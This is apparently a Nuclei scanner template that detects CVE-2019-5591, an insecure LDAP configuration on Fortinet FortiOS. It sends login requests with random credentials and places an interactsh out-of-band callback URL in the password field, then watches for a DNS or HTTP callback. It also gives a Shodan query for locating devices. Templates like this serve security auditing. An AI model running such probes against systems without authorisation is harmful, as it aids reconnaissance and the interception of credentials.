id: CVE-2019-5591 info: name: FortiOS - Insecure LDAP Configuration Detection author: ayewo severity: medium description: | The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions. impact: | Unauthenticated attackers can intercept sensitive information by impersonating LDAP servers within the same subnet. remediation: | Configure LDAP server settings properly and disable default configurations; update to the latest firmware version. reference: - https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591 - https://www.fortiguard.com/psirt/FG-IR-19-037 classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2019-5591 epss-score: 0.50553 epss-percentile: 0.97897 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet product: fortigate shodan-query: 'cpe:"cpe:2.3:o:fortinet:fortios"' tags: cve,cve2019,fortinet,ldap,kev,vkev,oast variables: username: "{{rand_text_alpha(10)}}" password: "{{rand_text_alphanumeric(12)}}" http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} - | POST /logincheck HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain;charset=UTF-8 ajax=1&username={{username}}&secretkey={{interactsh-url}} matchers-condition: and matchers: - type: word part: body_1 words: - 'name="username"' - 'name="secretkey"' condition: and - type: status status: - 200 - type: dsl dsl: - contains(body_2, "0") - contains(body_2, "1") - contains(body_2, "2") condition: or - type: word part: body_2 words: - "ajax=1&username=" condition: or negative: true - type: word part: interactsh_protocol words: - "dns" - "http" # digest: 4b0a00483046022100e1ae86b880c76d6a5506197fe2c8afabee73e99571f9ddee78b88b869d2c1a560221008415800d788ff06b631233c2b9c0b0267d258f65040da99a130d2f0bfbc09e86:922c64590222798bb761d5b6d8e72950